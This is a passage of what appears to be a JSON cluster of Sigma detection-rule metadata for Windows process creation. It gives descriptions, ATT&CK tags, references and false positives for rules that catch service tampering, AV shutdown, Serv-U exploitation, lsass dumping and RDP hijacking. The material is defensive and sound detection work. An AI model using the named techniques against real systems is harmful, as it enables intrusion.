"https://docs.microsoft.com/pt-br/windows/win32/secauthz/sid-strings", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_dacl_modification.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1543.003" - ], - "creation_date": "2020/10/16", - "filename": "proc_creation_win_susp_service_dacl_modification.yml", - "author": "Jonhnathan Ribeiro, oscd.community", - "level": "high", - "falsepositive": [ - 
"Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious DACL modifications via the \"Set-Service\" cmdlet using the \"SecurityDescriptorSddl\" flag (Only available with PowerShell 7) that can be used to hide services or make them unstopable", - "uuid": "a95b9b42-1308-4735-a1af-abb1c5e6f5ac", - "value": "Suspicious Service DACL Modification Via Set-Service Cmdlet", - "meta": { - "refs": [ - "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/", - "https://docs.microsoft.com/pt-br/windows/win32/secauthz/sid-strings", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_dacl_modification_set_service.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1543.003" - ], - "creation_date": "2022/10/18", - "filename": "proc_creation_win_susp_service_dacl_modification_set_service.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a service binary running in a suspicious directory", - "uuid": "883faa95-175a-4e22-8181-e5761aeb373c", - "value": "Suspicious Service Binary Directory", - "meta": { - "refs": [ - "https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_dir.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1202" - ], - "creation_date": "2021/03/09", - "filename": "proc_creation_win_susp_service_dir.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of 'Stop-Service' or 'Remove-Service' powershell cmdlet to disable AV services.\nAdversaries 
may disable security tools to avoid possible detection of their tools and activities by stopping antivirus service\n", - "uuid": "6783aa9e-0dc3-49d4-a94a-8b39c5fd700b", - "value": "Stop Or Remove Antivirus Service", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_modification.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2021/07/07", - "filename": "proc_creation_win_susp_service_modification.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects service path modification via the \"sc\" binary to a suspicious command or path", - "uuid": "138d3531-8793-4f50-a2cd-f291b2863d78", - "value": "Suspicious Service Path Modification", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md", - "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_path_modification.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" - ], - "creation_date": "2019/10/21", - "filename": "proc_creation_win_susp_service_path_modification.yml", - "author": "Victor Sergeev, oscd.community, Nasreddine Bencherchali (update)", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - 
"logsource.product": "windows" - } - }, - { - "description": "Detects the usage of one of the the commands to stop services such as 'net', 'sc'...etc in order to stop critical or important windows services such as AV, Backup...etc. As seen being used in some ransomware scripts", - "uuid": "ce72ef99-22f1-43d4-8695-419dcb5d9330", - "value": "Suspicious Stop Windows Service", - "meta": { - "refs": [ - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus/Genshin%20Impact%20Figure%2010.jpg", - "https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_stop.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1489" - ], - "creation_date": "2022/09/01", - "filename": "proc_creation_win_susp_service_stop.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Administrator or tools shutting down the services due to upgrade or removal purposes. 
If you experience some FP please consider adding filters to the parent process launching this command and not removing the entry" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects patterns as noticed in exploitation of Serv-U CVE-2021-35211 vulnerability by threat group DEV-0322", - "uuid": "75578840-9526-4b2a-9462-af469a45e767", - "value": "Serv-U Exploitation CVE-2021-35211 by DEV-0322", - "meta": { - "refs": [ - "https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_servu_exploitation_cve_2021_35211.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1136.001", - "cve.2021.35211" - ], - "creation_date": "2021/07/14", - "filename": "proc_creation_win_susp_servu_exploitation_cve_2021_35211.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious process pattern which could be a sign of an exploited Serv-U service", - "uuid": "58f4ea09-0fc2-4520-ba18-b85c540b0eaf", - "value": "Suspicious Serv-U Process Pattern", - "meta": { - "refs": [ - "https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_servu_process_pattern.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1555", - "cve.2021.35211" - ], - "creation_date": "2021/07/14", - "filename": "proc_creation_win_susp_servu_process_pattern.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate uses in which users or programs use the SSH service of Serv-U for 
remote command execution" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", - "uuid": "b2317cfa-4a47-4ead-b3ff-297438c0bc2d", - "value": "Suspicious Execution of SharpView Aka PowerView", - "meta": { - "refs": [ - "https://github.com/tevora-threat/SharpView/", - "https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-4---system-discovery-using-sharpview", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_sharpview.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1049", - "attack.t1069.002", - "attack.t1482", - "attack.t1135", - "attack.t1033" - ], - "creation_date": "2021/12/10", - "filename": "proc_creation_win_susp_sharpview.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious usage of the ShellExec_RunDLL function to launch other commands as seen in the the raspberry-robin attack", - "uuid": "d87bd452-6da1-456e-8155-7dc988157b7d", - "value": "Suspicious Usage Of ShellExec_RunDLL", - "meta": { - "refs": [ - "https://redcanary.com/blog/raspberry-robin/", - "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shellexec_rundll_usage.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2022/09/01", - "filename": "proc_creation_win_susp_shellexec_rundll_usage.yml", - "author": 
"Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious shell spawned from Java host process (e.g. log4j exploitation)", - "uuid": "0d34ed8b-1c12-4ff2-828c-16fc860b766d", - "value": "Suspicious Shells Spawned by Java", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shell_spawn_by_java.yml" - ], - "tags": [ - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" - ], - "creation_date": "2021/12/17", - "filename": "proc_creation_win_susp_shell_spawn_by_java.yml", - "author": "Andreas Hunkeler (@Karneades), Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate calls to system binaries", - "Company specific internal usage" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious shell spawn from Java utility keytool process (e.g. 
adselfservice plus exploitation)", - "uuid": "90fb5e62-ca1f-4e22-b42e-cc521874c938", - "value": "Suspicious Shells Spawn by Java Utility Keytool", - "meta": { - "refs": [ - "https://redcanary.com/blog/intelligence-insights-december-2021", - "https://www.synacktiv.com/en/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shell_spawn_by_java_keytool.yml" - ], - "tags": [ - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" - ], - "creation_date": "2021/12/22", - "filename": "proc_creation_win_susp_shell_spawn_by_java_keytool.yml", - "author": "Andreas Hunkeler (@Karneades)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious shell spawn from MSSQL process, this might be sight of RCE or SQL Injection", - "uuid": "869b9ca7-9ea2-4a5a-8325-e80e62f75445", - "value": "Suspicious Shells Spawn by SQL Server", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shell_spawn_from_mssql.yml" - ], - "tags": [ - "attack.t1505.003", - "attack.t1190", - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" - ], - "creation_date": "2020/12/11", - "filename": "proc_creation_win_susp_shell_spawn_from_mssql.yml", - "author": "FPT.EagleEye Team, wagga", - "level": "high", - "falsepositive": "No established falsepositives", - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious processes including shells spawnd from WinRM host process", - "uuid": "5cc2cda8-f261-4d88-a2de-e9e193c86716", - "value": "Suspicious Processes Spawned by WinRM", - "meta": { - "refs": [ - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shell_spawn_from_winrm.yml" - ], - "tags": [ - "attack.t1190", - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" - ], - "creation_date": "2021/05/20", - "filename": "proc_creation_win_susp_shell_spawn_from_winrm.yml", - "author": "Andreas Hunkeler (@Karneades), Markus Neis", - "level": "high", - "falsepositive": [ - "Legitimate WinRM usage" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects actions that clear the local ShimCache and remove forensic evidence", - "uuid": "b0524451-19af-4efa-a46f-562a977f792e", - "value": "ShimCache Flush", - "meta": { - "refs": [ - "https://medium.com/@blueteamops/shimcache-flush-89daff28d15e", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shimcache_flush.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "creation_date": "2021/02/01", - "filename": "proc_creation_win_susp_shimcache_flush.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Use of the commandline to shutdown or reboot windows", - "uuid": "34ebb878-1b15-4895-b352-ca2eeb99b274", - "value": "Suspicious Execution of Shutdown", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shutdown.yml" - ], - "tags": [ - "attack.impact", - "attack.t1529" - ], - "creation_date": "2022/01/01", - "filename": "proc_creation_win_susp_shutdown.yml", - "author": "frack113", - "level": 
"medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious Splwow64.exe process without any command line parameters", - "uuid": "1f1a8509-2cbb-44f5-8751-8e1571518ce2", - "value": "Suspicious Splwow64 Without Params", - "meta": { - "refs": [ - "https://twitter.com/sbousseaden/status/1429401053229891590?s=12", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_splwow64.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1202" - ], - "creation_date": "2021/08/23", - "filename": "proc_creation_win_susp_splwow64.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious print spool service (spoolsv.exe) child processes.", - "uuid": "dcdbc940-0bff-46b2-95f3-2d73f848e33b", - "value": "Suspicious Spool Service Child Process", - "meta": { - "refs": [ - "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/efa17a600b43c897b4b7463cc8541daa1987eeb4/Exploits/Print%20Spooler%20RCE/Suspicious%20Spoolsv%20Child%20Process.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_spoolsv_child_processes.yml" - ], - "tags": [ - "attack.execution", - "attack.t1203", - "attack.privilege_escalation", - "attack.t1068" - ], - "creation_date": "2021/07/11", - "filename": "proc_creation_win_susp_spoolsv_child_processes.yml", - "author": "Justin C. 
(@endisphotic), @dreadphones (detection), Thomas Patzke (Sigma rule)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Possible Squirrel Packages Manager as Lolbin", - "uuid": "fa4b21c9-0057-4493-b289-2556416ae4d7", - "value": "Squirrel Lolbin", - "meta": { - "refs": [ - "http://www.hexacorn.com/blog/2019/03/30/sqirrel-packages-manager-as-a-lolbin-a-k-a-many-electron-apps-are-lolbins-by-default/", - "http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_squirrel_lolbin.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218" - ], - "creation_date": "2019/11/12", - "filename": "proc_creation_win_susp_squirrel_lolbin.yml", - "author": "Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community", - "level": "medium", - "falsepositive": [ - "1Clipboard", - "Beaker Browser", - "Caret", - "Collectie", - "Discord", - "Figma", - "Flow", - "Ghost", - "GitHub Desktop", - "GitKraken", - "Hyper", - "Insomnia", - "JIBO", - "Kap", - "Kitematic", - "Now Desktop", - "Postman", - "PostmanCanary", - "Rambox", - "Simplenote", - "Skype", - "Slack", - "SourceTree", - "Stride", - "Svgsus", - "WebTorrent", - "WhatsApp", - "WordPress.com", - "Atom", - "Gitkraken", - "Slack", - "Teams" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious SSH tunnel port forwarding to a local port", - "uuid": "327f48c1-a6db-4eb8-875a-f6981f1b0183", - "value": "Suspicious SSH Port Forwarding", - "meta": { - "refs": [ - "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ssh_port_forward.yml" - ], - "tags": [ - "attack.command_and_control", - 
"attack.t1572", - "attack.lateral_movement", - "attack.t1021.001" - ], - "creation_date": "2022/10/12", - "filename": "proc_creation_win_susp_ssh_port_forward.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Administrative activity using a remote port forwarding to a local port" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Execution of ssh.exe to perform data exfiltration and tunneling through RDP", - "uuid": "f7d7ebd5-a016-46e2-9c54-f9932f2d386d", - "value": "Suspicious SSH Usage RDP Tunneling", - "meta": { - "refs": [ - "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ssh_usage.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1572" - ], - "creation_date": "2022/10/12", - "filename": "proc_creation_win_susp_ssh_usage.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Administrative activity" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious svchost process start", - "uuid": "01d2e2a1-5f09-44f7-9fc1-24faa7479b6d", - "value": "Suspicious Svchost Process", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_svchost.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036.005" - ], - "creation_date": "2017/08/15", - "filename": "proc_creation_win_susp_svchost.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the 
process memory space.", - "uuid": "16c37b52-b141-42a5-a3ea-bbe098444397", - "value": "Suspect Svchost Activity", - "meta": { - "refs": [ - "https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_svchost_no_cli.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" - ], - "creation_date": "2019/12/28", - "filename": "proc_creation_win_susp_svchost_no_cli.yml", - "author": "David Burkett", - "level": "high", - "falsepositive": [ - "Rpcnet.exe / rpcnetp.exe which is a lojack style software. https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious sysprep process start with AppData folder as target (as used by Trojan Syndicasec in Thrip report by Symantec)", - "uuid": "d5b9ae7a-e6fc-405e-80ff-2ff9dcc64e7e", - "value": "Sysprep on AppData Folder", - "meta": { - "refs": [ - "https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets", - "https://app.any.run/tasks/61a296bb-81ad-4fee-955f-3b399f4aaf4b", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_sysprep_appdata.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ], - "creation_date": "2018/06/22", - "filename": "proc_creation_win_susp_sysprep_appdata.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "False positives depend on scripts and administrative tools used in the monitored environment" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of the \"systeminfo\" command to retrieve information", - "uuid": "0ef56343-059e-4cb6-adc1-4c3c967c5e46", - "value": 
"Suspicious Execution of Systeminfo", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-1---system-information-discovery", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/systeminfo", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_systeminfo.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1082" - ], - "creation_date": "2022/01/01", - "filename": "proc_creation_win_susp_systeminfo.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter)", - "uuid": "2617e7ed-adb7-40ba-b0f3-8f9945fe6c09", - "value": "Suspicious SYSTEM User Process Creation", - "meta": { - "refs": [ - "Internal Research", - "https://tools.thehacker.recipes/mimikatz/modules", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_system_user_anomaly.yml" - ], - "tags": "No established tags", - "creation_date": "2021/12/20", - "filename": "proc_creation_win_susp_system_user_anomaly.yml", - "author": "Florian Roth (rule), David ANDRE (additional keywords)", - "level": "high", - "falsepositive": [ - "Administrative activity", - "Scripts and administrative tools used in the monitored environment", - "Monitoring activity" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Access to Domain Group Policies stored in SYSVOL", - "uuid": "05f3c945-dcc8-4393-9f3d-af65077a8f86", - "value": "Suspicious SYSVOL Domain Group Policy Access", - "meta": { - "refs": [ - "https://adsecurity.org/?p=2288", - 
"https://www.hybrid-analysis.com/sample/f2943f5e45befa52fb12748ca7171d30096e1d4fc3c365561497c618341299d5?environmentId=100", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_sysvol_access.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.006" - ], - "creation_date": "2018/04/09", - "filename": "proc_creation_win_susp_sysvol_access.yml", - "author": "Markus Neis, Jonhnathan Ribeiro, oscd.community", - "level": "medium", - "falsepositive": [ - "Administrative activity" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries can interact with the DACLs using built-in Windows commands takeown which can grant adversaries higher permissions on specific files and folders", - "uuid": "554601fb-9b71-4bcc-abf4-21a611be4fde", - "value": "Suspicious Recursive Takeown", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/takeown", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.001/T1222.001.md#atomic-test-1---take-ownership-using-takeown-utility", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_takeown.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1222.001" - ], - "creation_date": "2022/01/30", - "filename": "proc_creation_win_susp_takeown.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Scripts created by developers and admins", - "Administrative activity" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects shell32.dll executing a DLL in a suspicious directory", - "uuid": "32b96012-7892-429e-b26c-ac2bf46066ff", - "value": "Shell32 DLL Execution in Suspicious Directory", - "meta": { - "refs": [ - 
"https://www.group-ib.com/resources/threat-research/red-curl-2.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_target_location_shell32.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218.011" - ], - "creation_date": "2021/11/24", - "filename": "proc_creation_win_susp_target_location_shell32.yml", - "author": "Christian Burkard", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may stop services or processes in order to conduct Data Destruction or Data Encrypted for Impact on the data stores of services like Exchange and SQL Server.", - "uuid": "86085955-ea48-42a2-9dd3-85d4c36b167d", - "value": "Suspicious Execution of Taskkill", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1489/T1489.md#atomic-test-3---windows---stop-service-by-killing-process", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_taskkill.yml" - ], - "tags": [ - "attack.impact", - "attack.t1489" - ], - "creation_date": "2021/12/26", - "filename": "proc_creation_win_susp_taskkill.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may attempt to get information about running processes on a system. 
Information obtained could be used to gain an understanding of common software/applications running on systems within the network", - "uuid": "63332011-f057-496c-ad8d-d2b6afb27f96", - "value": "Suspicious Tasklist Discovery Command", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1057/T1057.md#atomic-test-2---process-discovery---tasklist", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_tasklist_command.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1057" - ], - "creation_date": "2021/12/11", - "filename": "proc_creation_win_susp_tasklist_command.yml", - "author": "frack113", - "level": "low", - "falsepositive": [ - "Administrator, hotline ask to user" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the creation of taskmgr.exe process in context of LOCAL_SYSTEM", - "uuid": "9fff585c-c33e-4a86-b3cd-39312079a65f", - "value": "Taskmgr as LOCAL_SYSTEM", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_taskmgr_localsystem.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036" - ], - "creation_date": "2018/03/18", - "filename": "proc_creation_win_susp_taskmgr_localsystem.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the creation of a process from Windows task manager", - "uuid": "3d7679bd-0c00-440c-97b0-3f204273e6c7", - "value": "Taskmgr as Parent", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_taskmgr_parent.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036" - ], - "creation_date": "2018/03/13", - "filename": 
"proc_creation_win_susp_taskmgr_parent.yml", - "author": "Florian Roth", - "level": "low", - "falsepositive": [ - "Administrative activity" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "This rule detects DLL injection and execution via LOLBAS - Tracker.exe", - "uuid": "148431ce-4b70-403d-8525-fcc2993f29ea", - "value": "DLL Injection with Tracker.exe", - "meta": { - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Tracker/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_tracker_execution.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1055.001" - ], - "creation_date": "2020/10/18", - "filename": "proc_creation_win_susp_tracker_execution.yml", - "author": "Avneet Singh @v3t0_, oscd.community", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory", - "uuid": "4c0aaedc-154c-4427-ada0-d80ef9c9deb6", - "value": "Process Access via TrolleyExpress Exclusion", - "meta": { - "refs": [ - "https://twitter.com/_xpn_/status/1491557187168178176", - "https://www.youtube.com/watch?v=Ie831jF0bb0", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_trolleyexpress_procdump.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.011", - "attack.credential_access", - "attack.t1003.001" - ], - "creation_date": "2022/02/10", - "filename": "proc_creation_win_susp_trolleyexpress_procdump.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a tscon.exe start as LOCAL SYSTEM", 
- "uuid": "9847f263-4a81-424f-970c-875dab15b79b", - "value": "Suspicious TSCON Start as SYSTEM", - "meta": { - "refs": [ - "http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html", - "https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6", - "https://www.ired.team/offensive-security/lateral-movement/t1076-rdp-hijacking-for-lateral-movement", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_tscon_localsystem.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ], - "creation_date": "2018/03/17", - "filename": "proc_creation_win_susp_tscon_localsystem.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a suspicious RDP session redirect using tscon.exe", - "uuid": "f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb", - "value": "Suspicious RDP Redirect Using TSCON", - "meta": { - "refs": [ - "http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html", - "https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6", - 